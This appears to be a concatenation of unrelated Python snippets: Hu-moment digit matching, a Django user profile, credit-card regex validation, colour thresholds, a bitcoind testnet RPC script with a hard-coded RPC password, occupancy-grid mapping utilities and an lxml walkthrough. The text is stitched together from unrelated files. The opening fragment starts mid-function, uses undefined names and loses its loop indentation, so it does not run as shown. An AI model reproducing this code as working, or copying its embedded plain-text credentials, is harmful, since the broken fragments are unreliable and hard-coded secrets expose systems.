img = cv2.imread(src)
# Convert to grayscale and apply Gaussian filtering
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
hsv = cv2.GaussianBlur(hsv, (5, 5), 0)
# Threshold the image
MIN= np.array([0,0,0],np.uint8)
MAX= np.array([355,55,100],np.uint8)
mask = cv2.inRange(hsv, MIN,MAX)
# ret,im_th = cv2.threshold(mask,160,255,cv2.THRESH_BINARY_INV)
# Find contours in the image
# ctrs, hier = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
#cv2.drawContours(img, ctrs,35, (255,100,0), 2)
# print len(ctrs)
moments=cv2.HuMoments(cv2.moments(mask)).flatten()
# print "Original hu moments are ",moments
mean=(moments[0]+moments[1]+moments[2]+moments[3]+moments[4]+moments[5]+moments[6])/7
# print mean
a1=(moments[0]-mean)
a11=pow(a1,2)
a2=(moments[1]-mean)
a22=pow(a2,2)
a3=(moments[2]-mean)
a33=pow(a3,2)
a4=(moments[3]-mean)
a44=pow(a4,2)
a5=(moments[4]-mean)
a55=pow(a5,2)
a6=(moments[5]-mean)
a66=pow(a6,2)
a7=(moments[6]-mean)
a77=pow(a7,2)
deviation=np.sqrt(a11+a22+a33+a44+a55+a66+a77)
a1=a1/deviation
a2=a2/deviation
a3=a3/deviation
a4=a4/deviation
a5=a5/deviation
a6=a6/deviation
a7=a7/deviation
# nom2Moments={a1,a2,a3,a4,a5,a6,a7}
# print "Normalised Hu Moments are", nomMoments
a1=a1*np.log(abs(a1))/abs(a1)
a2=a2*np.log(abs(a2))/abs(a2)
a3=a3*np.log(abs(a3))/abs(a3)
a4=a4*np.log(abs(a4))/abs(a4)
a5=a5*np.log(abs(a5))/abs(a5)
a6=a6*np.log(abs(a6))/abs(a6)
a7=a7*np.log(abs(a7))/abs(a7)
D=abs(a1-logHuMoments[0])+abs(a2-logHuMoments[1])+abs(a3-logHuMoments[2])+abs(a4-logHuMoments[3])+abs(a5-logHuMoments[4])+abs(a6-logHuMoments[5])+abs(a7-logHuMoments[6])
print D
# blue=np.uint8([[[0,0,0]]])
# hsv_blue=cv2.cvtColor(blue, cv2.COLOR_BGR2HSV)
# print hsv_blue
# cv2.imshow('contours',mask)
# cv2.imshow('original',img)
image='digits/4.jpg'
img = cv2.imread(image)
# Convert to grayscale and apply Gaussian filtering
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
hsv = cv2.GaussianBlur(hsv, (5, 5), 0)
# Threshold the image
MIN= np.array([0,0,0],np.uint8)
MAX= np.array([355,55,100],np.uint8)
mask = cv2.inRange(hsv, MIN,MAX)
cv2.imwrite("444.jpg",mask)
# ret,im_th = cv2.threshold(mask,160,255,cv2.THRESH_BINARY_INV)
# Find contours in the image
# ctrs, hier = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
#cv2.drawContours(img, ctrs,35, (255,100,0), 2)
# print len(ctrs)
moments=cv2.HuMoments(cv2.moments(mask)).flatten()
# print "Original hu moments are ",moments
mean=(moments[0]+moments[1]+moments[2]+moments[3]+moments[4]+moments[5]+moments[6])/7
# print mean
a1=(moments[0]-mean)
a11=pow(a1,2)
a2=(moments[1]-mean)
a22=pow(a2,2)
a3=(moments[2]-mean)
a33=pow(a3,2)
a4=(moments[3]-mean)
a44=pow(a4,2)
a5=(moments[4]-mean)
a55=pow(a5,2)
a6=(moments[5]-mean)
a66=pow(a6,2)
a7=(moments[6]-mean)
a77=pow(a7,2)
deviation=np.sqrt(a11+a22+a33+a44+a55+a66+a77)
a1=a1/deviation
a2=a2/deviation
a3=a3/deviation
a4=a4/deviation
a5=a5/deviation
a6=a6/deviation
a7=a7/deviation
nomMoments=[a1,a2,a3,a4,a5,a6,a7]
# print "Normalised Hu Moments are", nomMoments
a1=a1*np.log(abs(a1))/abs(a1)
a2=a2*np.log(abs(a2))/abs(a2)
a3=a3*np.log(abs(a3))/abs(a3)
a4=a4*np.log(abs(a4))/abs(a4)
a5=a5*np.log(abs(a5))/abs(a5)
a6=a6*np.log(abs(a6))/abs(a6)
a7=a7*np.log(abs(a7))/abs(a7)
logMoments=[a1,a2,a3,a4,a5,a6,a7]
print "Digit >> 1"
for i in range(0,10):
image="digits/"+str(i)+".jpg"
calHuMoments(image,logMoments, i)
cv2.waitKey() |
'''
Overrides nothing.
'''
|
from django.db import models
from django.contrib.auth.models import User
from calendar import timegm as epoch
from api_boilerplate.models import ApiKey
class UserProfile(models.Model):
    """Per-user profile with API-key access and API serialisation helpers."""

    user = models.OneToOneField(User, related_name='profile')

    def __unicode__(self):
        return u'%s' % (self.user.username)

    def get_api_key(self):
        """Return this user's API key, creating one on first access."""
        api_key, _created = ApiKey.objects.get_or_create(user=self.user)
        return api_key.key

    def api(self, include_account=False):
        """Serialise the user for the API; key included only on request."""
        user = self.user
        payload = {
            'username': user.username,
            'is_admin': user.is_staff,
            'joined_at': epoch(user.date_joined.timetuple()),
            'resource_uri': '/api/users/%s/' % user.pk,
        }
        if include_account:
            # The API key is only exposed when account info is requested.
            payload['api_key'] = self.get_api_key()
        return payload
# Lazily attach a profile to every User: accessing ``user.profile`` creates
# the UserProfile row on first use.
User.profile = property(lambda u: UserProfile.objects.get_or_create(user=u)[0])
import re
def check_credit_number_for_validating(string1):
    """Return False when the card's digits (hyphens removed) contain four
    or more equal consecutive characters, True otherwise."""
    digits = ''.join(string1.split('-'))
    for start in range(len(digits) - 3):
        if digits[start] == digits[start + 1] == digits[start + 2] == digits[start + 3]:
            return False
    return True
# Read N card numbers and report whether each is a valid credit card:
# starts with 4-6, 16 digits (optionally in hyphenated groups of 4),
# and no run of 4+ identical digits.
for _ in range(int(input())):
    credit_number = input()
    # BUG FIX: the 16-digit pattern was matched against the undefined name
    # ``s`` (NameError at runtime) instead of ``credit_number``.
    plain = re.compile('^[4-6][0-9]{15}$').match(credit_number)
    hyphenated = re.compile('^[4-6][0-9]{3}(-[0-9]{4}){3}$').match(credit_number)
    if (plain or hyphenated) and check_credit_number_for_validating(credit_number):
        print("Valid")
    else:
        print("Invalid")
"""
Colour definitions used by the somewhere over the rainbow activity.

Bounds are [channel0, channel1, channel2] triples; the LOWER/UPPER *_ARRAY
lists are index-aligned with COLOUR_NAME_ARRAY (Red, Blue, Green, Yellow).
"""
# Define the colour boundaries in HSV (hue values here run 0-179)
LOWER_RED_LFT_HSV = [165, 50, 50] # Left of 0deg Red = ~330deg to 359deg
UPPER_RED_LFT_HSV = [179, 255, 255] # Red
LOWER_RED_HSV = [0, 50, 50] # Red = 0deg to ~30deg
UPPER_RED_HSV = [15, 255, 255] # Red
LOWER_BLUE_HSV = [80, 50, 50] # Blue = ~180deg to ~260deg
UPPER_BLUE_HSV = [140, 255, 255] # Blue
LOWER_GREEN_HSV = [45, 50, 50] # Green = ~90deg to ~150deg
UPPER_GREEN_HSV = [75, 255, 255] # Green
LOWER_YELLOW_HSV = [15, 50, 50] # Yellow = ~30deg to ~90deg
UPPER_YELLOW_HSV = [45, 255, 255] # Yellow
LOWER_HSV_ARRAY = [
    LOWER_RED_HSV, LOWER_BLUE_HSV, LOWER_GREEN_HSV, LOWER_YELLOW_HSV
]
UPPER_HSV_ARRAY = [
    UPPER_RED_HSV, UPPER_BLUE_HSV, UPPER_GREEN_HSV, UPPER_YELLOW_HSV
]
# Define the colour boundaries in YUV
LOWER_RED_YUV = [30, 100, 133] # Red
UPPER_RED_YUV = [255, 127, 255] # Red
LOWER_BLUE_YUV = [36, 122, 49] # Blue
UPPER_BLUE_YUV = [255, 255, 123] # Blue
LOWER_GREEN_YUV = [31, 108, 0] # Green
UPPER_GREEN_YUV = [255, 132, 123] # Green
LOWER_YELLOW_YUV = [57, 0, 117] # Yellow
UPPER_YELLOW_YUV = [255, 132, 185] # Yellow
LOWER_YUV_ARRAY = [
    LOWER_RED_YUV, LOWER_BLUE_YUV, LOWER_GREEN_YUV, LOWER_YELLOW_YUV
]
UPPER_YUV_ARRAY = [
    UPPER_RED_YUV, UPPER_BLUE_YUV, UPPER_GREEN_YUV, UPPER_YELLOW_YUV
]
# Colour names, index-aligned with the *_ARRAY lists above
COLOUR_NAME_ARRAY = ['Red', 'Blue', 'Green', 'Yellow']
|
from bitcoinrpc.authproxy import AuthServiceProxy, JSONRPCException
# RPC credentials for a local bitcoind node (port 18332 is the testnet RPC
# port).  NOTE(review): credentials are hard-coded; move to config/env
# before sharing this file.
rpc_user = "bitcoin_orpheus"
rpc_password = "EwJeV3LZTyTVozdECF027BkBMnNDwQaVfakG3A4wXYyk"
rpcserver_host = "localhost"
rpcserver_port = 18332
# Authenticated JSON-RPC proxy to the node.
rpc = AuthServiceProxy("http://%s:%s@%s:%s"
    % (rpc_user, rpc_password, rpcserver_host, rpcserver_port))
print(rpc.getblockcount())
# Pick the first unspent output as the input of a new raw transaction.
first_unspent = rpc.listunspent()[0]
print first_unspent
print first_unspent['txid']
outpoints = [
    {
        'txid' : first_unspent['txid'],
        'vout' : first_unspent['vout']
    }
]
# Send 10 coins to a freshly generated address of our own wallet.
outputs = {
    rpc.getnewaddress() : 10
}
raw_transaction = rpc.createrawtransaction(outpoints, outputs)
new_transaction = rpc.decoderawtransaction(raw_transaction)
import pprint
pp = pprint.PrettyPrinter(indent=1)
pp.pprint(new_transaction)
# new_address =
# print(new_address)
# rpc.sendtoaddress(new_address,10)
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
last mod 7/1/19
using opencv's warpAffine instead of handmade grid conversions
"""
import numpy as np
from cv2 import warpAffine, BORDER_TRANSPARENT, BORDER_CONSTANT
from cv2 import INTER_LINEAR, INTER_CUBIC, WARP_INVERSE_MAP
# Occupancy-grid geometry: tile edge length, world coordinate of the grid's
# lower corner, and grid dimensions (x-tiles, y-tiles).
tile_size = .5
tile_start = (-10., -50.)
occupancygrid_shape = (140, 200)
ntx, nty = occupancygrid_shape
# World coordinates of each tile's lower corner, shape (ntx, nty, 2).
grid = np.mgrid[:ntx, :nty]
grid = grid.transpose((1,2,0)).astype(float)
#grid += .5
grid *= tile_size
grid += tile_start
def updateGridwGrid(priorgrid, msmtgrid, viewedgrid, msmt_confusion_matrix):
    """
    Bayesian occupancy update of a grid given one measurement pass.

    priorgrid -- float matrix of occupancy probabilities (prior)
    msmtgrid, viewedgrid -- boolean matrices: positive detections and which
        tiles were observed at all
    msmt_confusion_matrix -- 2x2 [[TN, FP], [FN, TP]] probabilities

    Tiles with a measurement get the positive update, viewed-but-empty
    tiles get the negative update, unviewed tiles keep their prior.
    P(x=1|z=1) = P(x=1)P(z=1|x=1)/(P(x=1)P(z=1|x=1) + (1-P(x=1))P(z=1|x=0))
    """
    (tn, fp), (fn, tp) = msmt_confusion_matrix
    pos_update = priorgrid * tp / (fp + priorgrid * (tp - fp))
    neg_update = priorgrid * fn / (tn + priorgrid * (fn - tn))
    posterior = priorgrid.copy()
    posterior[msmtgrid] = pos_update[msmtgrid]
    missed = viewedgrid & (msmtgrid == False)
    posterior[missed] = neg_update[missed]
    return posterior
#
#def reOrientGridOlder(priorgrid, transform, initial_val, gridstep, gridstart, gridlen):
# """
# transform = [[cos,-sin,tx],[sin,cos,ty],[0,0,1]]
# shift an occupancy grid
# Obviously, there is error due to imperfect matching of old and new tiles.
# This function does an approximation by finding the old tiles corresponding to
# the bottom left and top right corners of the new tile. The returned occupancy
# is a weighted sum of the two. Tiles that were previously out of frame are
# set to the initial value.
# """
# grid = np.mgrid[gridstart[0]:gridstart[0]+gridlen[0],
# gridstart[1]:gridstart[1]+gridlen[1]]
# grid = grid.transpose((1,2,0)) * gridstep
# tile_distance_limit = gridstep[0]*2**.5 + .01
# newgrid_pos = (grid - transform[:2,2]).dot(transform[:2,:2])
# newgrid_idxs = np.floor(newgrid_pos/gridstep).astype(int) - gridstart
# newgrid_bl_xidx = newgrid_idxs[:,:,0]
# newgrid_bl_yidx = newgrid_idxs[:,:,1]
# newgrid_outofzone = newgrid_bl_xidx >= gridlen[0]
# newgrid_outofzone |= newgrid_bl_yidx >= gridlen[1]
# newgrid_outofzone |= newgrid_bl_xidx < 0
# newgrid_outofzone |= newgrid_bl_yidx < 0
# newgrid_idxs[newgrid_outofzone] = 0
# newgrid_diff = newgrid_pos - grid[newgrid_bl_xidx,newgrid_bl_yidx]
# newgrid_bl_score = tile_distance_limit - np.hypot(newgrid_diff[:,:,0],
# newgrid_diff[:,:,1])
# newgrid_bl_score[newgrid_outofzone] = 0
# assert np.all(newgrid_bl_score >= 0)
#
# newgrid_pos = (grid + gridstep - transform[:2,2]).dot(transform[:2,:2])
# newgrid_idxs = np.floor(newgrid_pos/gridstep).astype(int) - gridstart
# newgrid_tr_xidx = newgrid_idxs[:,:,0]
# newgrid_tr_yidx = newgrid_idxs[:,:,1]
# newgrid_outofzone = newgrid_tr_xidx >= gridlen[0]
# newgrid_outofzone |= newgrid_tr_yidx >= gridlen[1]
# newgrid_outofzone |= newgrid_tr_xidx < 0
# newgrid_outofzone |= newgrid_tr_yidx < 0
# newgrid_idxs[newgrid_outofzone] = 0
# newgrid_diff = grid[newgrid_tr_xidx,newgrid_tr_yidx]+gridstep - newgrid_pos
# newgrid_tr_score = tile_distance_limit - np.hypot(newgrid_diff[:,:,0],
# newgrid_diff[:,:,1])
# newgrid_tr_score[newgrid_outofzone] = 0
# assert np.all(newgrid_tr_score >= 0)
#
# newgrid = newgrid_bl_score * priorgrid[newgrid_bl_xidx, newgrid_bl_yidx]
# newgrid += newgrid_tr_score * priorgrid[newgrid_tr_xidx, newgrid_tr_yidx]
# newgrid += initial_val * .001
# newgrid_count = newgrid_bl_score + newgrid_tr_score + .001
# newgrid /= newgrid_count
# return newgrid
def reOrientGridOld(priorgrid, transform, initial_val, gridstep, gridstart, gridlen):
    """
    Shift/rotate an occupancy grid by a rigid 2D transform
    transform = [[cos,-sin,tx],[sin,cos,ty],[0,0,1]].

    Old and new tiles do not line up exactly, so each new tile's value is
    approximated by averaging old-grid values sampled at r*r points evenly
    spaced inside the tile; samples landing outside the old grid contribute
    initial_val.
    """
    r = 4
    cellgrid = np.mgrid[gridstart[0]:gridstart[0] + gridlen[0],
                        gridstart[1]:gridstart[1] + gridlen[1]]
    cellgrid = cellgrid.transpose((1, 2, 0)) * gridstep
    offsets = (np.mgrid[:r, :r].transpose((1, 2, 0)).reshape((r * r, 2)) + .5)
    offsets = offsets * (gridstep / r)
    accumulated = np.zeros(gridlen)
    for offset in offsets:
        sample_pos = (cellgrid + offset - transform[:2, 2]).dot(transform[:2, :2])
        sample_idx = np.floor(sample_pos / gridstep).astype(int) - gridstart
        xs = sample_idx[:, :, 0]
        ys = sample_idx[:, :, 1]
        inside = ((xs >= 0) & (ys >= 0) &
                  (xs < gridlen[0]) & (ys < gridlen[1]))
        # Clamp out-of-range indices to 0 purely to avoid IndexError; the
        # np.where below discards those samples anyway.
        sample_idx[inside == False] = 0
        accumulated += np.where(inside, priorgrid[xs, ys], initial_val)
    return accumulated / r ** 2
def reOrientGrid(priorgrid, transform, initial_val, gridstep, gridstart, gridlen):
    """
    transform = [[cos,-sin,tx],[sin,cos,ty],[0,0,1]]
    shift an occupancy grid
    Obviously, there is error due to imperfect matching of old and new tiles.
    Uses cv2.warpAffine (bilinear) instead of per-tile sampling; tiles that
    come from outside the old grid are filled with initial_val.
    """
    # Build the affine warp in grid-index space.  cv2's convention puts the
    # y-axis (array columns) first, hence the swapped rows/entries in T.
    # NOTE(review): the translation combines the world-space offset
    # (transform[:,2]/gridstep) with gridstart terms rotated through the
    # transform -- assumed correct for rigid transforms; cross-check against
    # reOrientGridOld's sampled version.
    movex = -gridstart[0]+transform[0,2]/gridstep[0]
    movex += transform[0,1]*gridstart[1] + transform[0,0]*gridstart[0]
    movey = -gridstart[1]+transform[1,2]/gridstep[1]
    movey += transform[1,1]*gridstart[1] + transform[1,0]*gridstart[0]
    T = np.array([[transform[1,1],transform[1,0],movey],
                  [transform[0,1],transform[0,0],movex]])
    return warpAffine(priorgrid, T, (gridlen[1],gridlen[0]),
                      flags=INTER_LINEAR,#+WARP_INVERSE_MAP,
                      borderMode=BORDER_CONSTANT, borderValue=initial_val)
#from groundRat import getElevation
import numba as nb
@nb.jit(nb.void(nb.b1[:,:], nb.f8, nb.f8, nb.f8, nb.f8, nb.f8, nb.f8))
def fillTriangle(canvas, ax, ay, bx, by, cx, cy):
    """
    helper for gridViewable
    based on
    http://www-users.mat.uni.torun.pl/~wrona/3d_tutor/tri_fillers.html
    assumes a->b->c is ccw, ax<bx, ax<cx

    Scanline fill: sets canvas[x, y] = True inside the triangle by sweeping
    x columns and filling the [syb, syc) span delimited by the two edges.
    """
    # Slopes of the two edges leaving vertex a.
    dxb = (by-ay)/(bx-ax)
    dxc = (cy-ay)/(cx-ax)
    if cx > bx + 1:
        # c extends further in x: after bx the b-edge is replaced by b->c.
        secondx = int(bx)
        thirdx = int(cx)
        dxb2 = (cy-by)/(cx-bx)
        dxc2 = dxc
    elif bx > cx + 1:
        # b extends further in x: after cx the c-edge is replaced by c->b.
        secondx = int(cx)
        thirdx = int(bx)
        dxb2 = dxb
        dxc2 = (by-cy)/(bx-cx)
    else:
        # b and c end at (nearly) the same column: no second sweep.
        secondx = int(bx)
        thirdx = secondx
        dxb2 = 0.
        dxc2 = 0.
    syb = ay
    syc = ay
    # First sweep: from a's column to the nearer of b/c.
    for sx in range(int(ax), secondx):
        syb += dxb
        syc += dxc
        canvas[sx, int(syb):int(syc)] = True
    # Second sweep: continue to the farther vertex with the updated slopes.
    for sx in range(secondx, thirdx):
        syb += dxb2
        syc += dxc2
        canvas[sx, int(syb):int(syc)] = True
extradist = 1.  # extra range added beyond each occlusion endpoint when filling
def gridViewable(occlusion_maps, occlusion_info, ground):
    """
    go faster -> triangle filling

    Marks which occupancy tiles were viewed by the sensor.  occlusion_info
    rows are (end_index, laser_angle) delimiting slices of occlusion_maps;
    occlusion_maps rows are (angle, dist, next_dist).  ground holds per-tile
    plane coefficients used as height = ground[...,3] - a*x - b*y.
    NOTE(review): the 1.65 / 2.0 constants look like sensor height and beam
    ceiling -- confirm units before relying on them.
    """
    gridcenters = grid + tile_size/2.
    dists = np.hypot(gridcenters[:,:,1], gridcenters[:,:,0])
    heights = ground[:,:,3]-ground[:,:,0]*gridcenters[:,:,0]-ground[:,:,1]*gridcenters[:,:,1]
    #heights = getElevation(gridcenters, ground)
    # Vertical angle band (small-angle approximation) each tile subtends.
    effective_min_angle = (0-1.65+heights)/dists
    effective_max_angle = (2-1.65+heights)/dists
    origin_x = np.searchsorted(gridcenters[:,0,0], 0)
    origin_y = np.searchsorted(gridcenters[0,:,1], 0)
    max_x = tile_start[0]+tile_size*ntx
    max_y = tile_start[1]+tile_size*nty
    viewed = np.zeros(occupancygrid_shape, dtype=bool)
    occlusion_startidx = 0
    for occlusion_endidx, laser_angle in occlusion_info:
        occlusion_endidx = int(occlusion_endidx)
        if occlusion_startidx == occlusion_endidx:
            continue
        # Tiles whose angle band straddles this laser's elevation angle.
        included = effective_min_angle < laser_angle
        included &= effective_max_angle > laser_angle
        inzone = np.zeros(occupancygrid_shape, dtype=bool)
        starting_angle = occlusion_maps[occlusion_startidx,0]
        starting_dist = occlusion_maps[occlusion_startidx,2]
        for ending_angle,ending_dist,nextdist in\
                occlusion_maps[occlusion_startidx+1:occlusion_endidx]:
            if starting_dist > 2:
                # Fill the sensor-origin triangle spanned by this segment,
                # extended by extradist and clipped to the grid bounds;
                # x/y are converted to fractional tile indices before filling.
                c = np.cos(starting_angle)
                s = np.sin(starting_angle)
                dist = starting_dist + extradist
                if dist*c > max_x:
                    dist = max_x/c
                if dist*s > max_y:
                    dist = max_y/s
                if dist*s < tile_start[1]:
                    dist = tile_start[1]/s
                starting_x = (c*dist - tile_start[0]) / tile_size
                starting_y = (s*dist - tile_start[1]) / tile_size
                c = np.cos(ending_angle)
                s = np.sin(ending_angle)
                dist = ending_dist + extradist
                if dist*c > max_x:
                    dist = max_x/c
                if dist*s > max_y:
                    dist = max_y/s
                if dist*s < tile_start[1]:
                    dist = tile_start[1]/s
                ending_x = (c*dist - tile_start[0]) / tile_size
                ending_y = (s*dist - tile_start[1]) / tile_size
                fillTriangle(inzone, origin_x, origin_y,
                             starting_x, starting_y, ending_x, ending_y)
            starting_dist = nextdist
            starting_angle = ending_angle
        viewed |= included & inzone
        occlusion_startidx = occlusion_endidx
    return viewed
def mixGrid(grid, mixer, outervalue, tempmat=None):
    """
    perform 2d convolution on a grid to emulate propagation between adjacent tiles
    tiles outside the limit of the grid are set to outervalue

    grid is updated IN PLACE.  mixer must have odd dimensions so the kernel
    has a well-defined centre.  tempmat, if given, is a preallocated scratch
    array of shape grid.shape + 2*pad (reusable across calls).
    """
    assert mixer.shape[0]%2 and mixer.shape[1]%2
    pad = np.array(mixer.shape)//2
    if tempmat is None:
        tempmat = np.zeros(grid.shape+pad*2, dtype=grid.dtype)
    else:
        assert all(pad*2+grid.shape == tempmat.shape)
    # Copy the grid into the centre, fill the border band with outervalue.
    tempmat[pad[0]:-pad[0], pad[1]:-pad[1]] = grid
    tempmat[:pad[0],:] = outervalue
    tempmat[-pad[0]:,:] = outervalue
    tempmat[:,:pad[1]] = outervalue
    tempmat[:,-pad[1]:] = outervalue
    # Zero-copy sliding-window view: element [i,j] is the kernel-sized
    # neighbourhood of tile (i,j); einsum contracts it with the kernel.
    viewshape = (grid.shape[0], grid.shape[1], mixer.shape[0], mixer.shape[1])
    view4conv = np.lib.stride_tricks.as_strided(tempmat, viewshape,
                                                tempmat.strides*2, writeable=False)
    grid[:] = np.einsum(view4conv, [0,1,2,3], mixer, [2,3], [0,1])
""" useful polynomial approximation of normal cdf
source = John D Cooke blog """
def approxNormalCdf(dev):
    """Logistic-polynomial approximation of the standard normal CDF
    (John D. Cook's blog)."""
    return 1. / (1 + np.exp(-.07056 * dev ** 3 - 1.5976 * dev))
def eigTwoxTwo(varx, vary, covxy):
    """Closed-form eigendecomposition of a symmetric 2x2 covariance matrix.

    Returns (eigval1, eigval2, c, s) where eigval1 >= eigval2 and (c, s) is
    the unit eigenvector belonging to eigval1.
    Reference: math.harvard.edu/archive/21b_fall_04/exhibits/2dmatrices/
    """
    trace_half = (varx + vary) * .5
    det = varx * vary - covxy * covxy
    big = trace_half + np.sqrt(trace_half * trace_half - det)
    small = 2 * trace_half - big
    norm = np.hypot(big - vary, covxy)
    return big, small, (big - vary) / norm, covxy / norm
""" this is an approximate cdf, assuming independent prob in x and y directions
"""
def mapNormal2Grid(meanx, meany, varx, vary, covxy,
                   gridstart, gridstep, gridlen):
    """Discretise an axis-aligned normal onto the grid (covxy is ignored).

    Approximate CDF assuming independent x and y; returns the outer product
    of per-axis cell probabilities renormalised to the grid span.  Falls
    back to a uniform grid when almost no probability mass lies inside.
    """
    def _axis_probs(mean, var, start, step, length):
        # Per-cell probability along one axis, renormalised to the span.
        edges = np.arange(start, start + length + 1) * step
        cdf = approxNormalCdf((edges - mean) / var ** .5)
        mass = cdf[-1] - cdf[0]
        if mass < 1e-10:
            return None
        return np.diff(cdf) / mass

    llx = _axis_probs(meanx, varx, gridstart[0], gridstep[0], gridlen[0])
    lly = None
    if llx is not None:
        lly = _axis_probs(meany, vary, gridstart[1], gridstep[1], gridlen[1])
    if llx is None or lly is None:
        # Very low likelihood of appearance inside the grid: uniform fallback.
        return np.zeros(gridlen) + 1. / gridlen[0] / gridlen[1]
    return np.outer(llx, lly)
""" approximate cdf, accounting for xy correlation
make normal cdf grid, do rotation transform to put on rectified grid
don't do scale transform, b.c. you would need to sum probs for increased scale
note: cv2 transformation matrices have y-axis first
"""
def mapNormal2GridRot(meanx, meany, varx, vary, covxy,
                      gridstart, gridstep, gridlen):
    """Discretise a correlated 2D normal onto the grid.

    Decorrelates via the 2x2 eigendecomposition, maps the axis-aligned
    normal with mapNormal2Grid, then rotates the result back onto the
    rectified grid with warpAffine (cv2 matrices put the y-axis first).
    Scale is deliberately not transformed -- that would require summing
    probabilities across cells.
    """
    rectvx, rectvy, rectc, rects = eigTwoxTwo(varx, vary, covxy)
    gridcenter = (gridstart + gridlen*.5)*gridstep
    # Rotate the mean about the grid centre into the decorrelated frame.
    rotmeanx = rectc*(meanx-gridcenter[0]) + rects*(meany-gridcenter[1]) + gridcenter[0]
    rotmeany = rectc*(meany-gridcenter[1]) - rects*(meanx-gridcenter[0]) + gridcenter[1]
    ingrid = mapNormal2Grid(rotmeanx, rotmeany, rectvx, rectvy,
                            0, gridstart, gridstep, gridlen)
    midx, midy = gridlen*.5 - .5
    # Inverse rotation about the grid's centre cell, in index space.
    T = np.array(((rectc, rects, midy-rectc*midy-rects*midx),
                  (-rects, rectc, midx-rectc*midx+rects*midy)))
    outgrid = warpAffine(ingrid, T, (gridlen[1], gridlen[0]),
                         flags=INTER_LINEAR,
                         borderMode=BORDER_CONSTANT, borderValue=0.)
    # bilinear interpolation may alter the sum of values
    # problem for probability distributions
    if np.sum(outgrid) > 1: outgrid /= np.sum(outgrid)
    return outgrid
"""
return subgrid with probability of occupancy
and subgrid location
default subsize 0 -- just pick the center cell and return this
if cell outside of grid, returns size-0 subgrid
"""
def mapNormal2Subgrid(normalparams, gridstart, gridstep, gridlen, subsize=0):
    """Return (subgrid_offset, subgrid) of occupancy probability for a normal.

    subsize is the half-width in tiles around the mean's tile (default 0:
    just the centre cell).  When the window lies fully outside the grid a
    size-0 subgrid is returned.
    """
    meanx, meany, varx, vary, covxy = normalparams
    centerx = int(np.floor(meanx / gridstep[0])) - gridstart[0]
    centery = int(np.floor(meany / gridstep[1])) - gridstart[1]
    xlo = max(centerx - subsize, 0)
    xhi = min(centerx + subsize + 1, gridlen[0])
    ylo = max(centery - subsize, 0)
    yhi = min(centery + subsize + 1, gridlen[1])
    subgridstart = np.array((xlo, ylo))
    subgridlen = np.array((xhi - xlo, yhi - ylo))
    if any(subgridlen <= 0):
        # Centre tile (plus margin) lies outside the grid: size-0 subgrid.
        return np.array((0, 0)), np.zeros((0, 0))
    subgrid = mapNormal2GridRot(meanx, meany, varx, vary, covxy,
                                subgridstart + gridstart, gridstep, subgridlen)
    return subgridstart, subgrid
"""
test reorientation, normal mapping, and mixing
"""
if __name__ == '__main__':
    import matplotlib.pyplot as plt
    plt.ioff()
    # Grid geometry and an example correlated 2D normal.
    gridstart = np.array((-4,-2))
    gridlen = np.array((8,8))
    gridstep = np.array((3.,3.))
    meanx = -3.
    meany = 8.
    varx = 4.**2
    vary = 3.**2
    covxy = .2*4*3
    normalmean = np.array((meanx, meany))
    normalvar = np.array(((varx, covxy), (covxy, vary)))
    ## make a high-res mesh of the normal distribution
    hresgridx, hresgridy = np.meshgrid(np.linspace(-12., 12, 100),
                                       np.linspace(-6., 18, 100))
    precvals, precvec = np.linalg.eigh(normalvar)
    # rectvarx, rectvary, precvecx, precvecy = eigTwoxTwo(4., 4., -1.)
    # precvals = np.array((rectvarx, rectvary))
    # precvec = np.array(((precvecx, -precvecy),(precvecy, precvecx)))
    precvals = 1/precvals
    # Unnormalised density on the mesh via the precision eigendecomposition.
    # NOTE(review): ll1/ll2 multiply by precvals rather than sqrt(precvals),
    # so the exponent uses squared precision -- fine for a visual contour
    # comparison, but not the true density; confirm if reused elsewhere.
    ll1 = precvals[0]*(precvec[0,0]*(hresgridx-normalmean[0]) +
                       precvec[1,0]*(hresgridy-normalmean[1]))
    ll2 = precvals[1]*(precvec[0,1]*(hresgridx-normalmean[0]) +
                       precvec[1,1]*(hresgridy-normalmean[1]))
    ll = np.exp(-.5*(ll1*ll1 + ll2*ll2))
    ## map the normal distribution to the grid
    outgrid = mapNormal2GridRot(meanx, meany, varx, vary, covxy,
                                gridstart, gridstep, gridlen)
    ## compare mapped distribution to correct version
    plt.subplot(121).contour(hresgridx, hresgridy, ll)
    # Transpose + vertical flip so imshow matches the world orientation.
    outgridForShow = outgrid.T[::-1]
    plt.subplot(122).imshow(outgridForShow)
    plt.show()
    # ## re-orient distribution
    #transform = np.array(((1.,0,-4),(0,1,0),(0,0,1)))
    transform = np.array(((.9798, -.2, -2.), (.2, .9798, 0), (0,0,1)))
    initial_val = .1
    # Compare the sampled (Old) and warpAffine re-orientations side by side.
    reoriented1 = reOrientGridOld(outgrid, transform, initial_val,
                                  gridstep, gridstart, gridlen)
    reoriented2 = reOrientGrid(outgrid, transform, initial_val,
                               gridstep, gridstart, gridlen)
    plt.figure(figsize=(10.,8.))
    plt.subplot(221).imshow(outgrid.T[::-1])
    plt.subplot(223).imshow(reoriented1.T[::-1])
    plt.subplot(224).imshow(reoriented2.T[::-1])
    plt.show()
from lxml import etree
# NOTE: Python 2 walkthrough of lxml.etree basics; the expected output of
# each statement is shown in the comment below it.
# get doc tree
doc = etree.parse('home.xml')
# get root element
root = doc.getroot()
print etree.tostring(root)
# Sample contents of home.xml (note the sample shows '<body/>' where
# '</body>' was presumably intended):
'''
<html>
<head>
<title>Your page title here</title>
<link href="mystyle.css" rel="stylesheet" type="text/css"/>
</head>
<body>
<p>this is first paragraph</p>
<p>this is second paragraph</p>
<body/>
<foot/>
</html>
'''
# elements are a list
print len(root)
# 2
child = root[0]
print child.tag
# head
# node has no subnodes
# (truth-testing an Element by its child count is deprecated in lxml)
print not root[-1]
# True
# node exists
print root[-1] is None
# False
print root[0].getnext().tag
# body
print root[1].getprevious().tag
# head
print child.getparent().tag
# html
# deprecated
for child in root.getchildren():
    print child.tag
# head
# body
# foot
for child in root:
    print child.tag
# head
# body
# foot
# find node's first child node
print len(root.find('head'))
# NOTE(review): the bare expression '2' below is a no-op statement; it was
# probably meant to be the comment '# 2'.
2
for p in root.findall('body/p'):
    print p.text
# this is first paragraph
# this is second paragraph
# attributes are a dict
link = root.find('head/link')
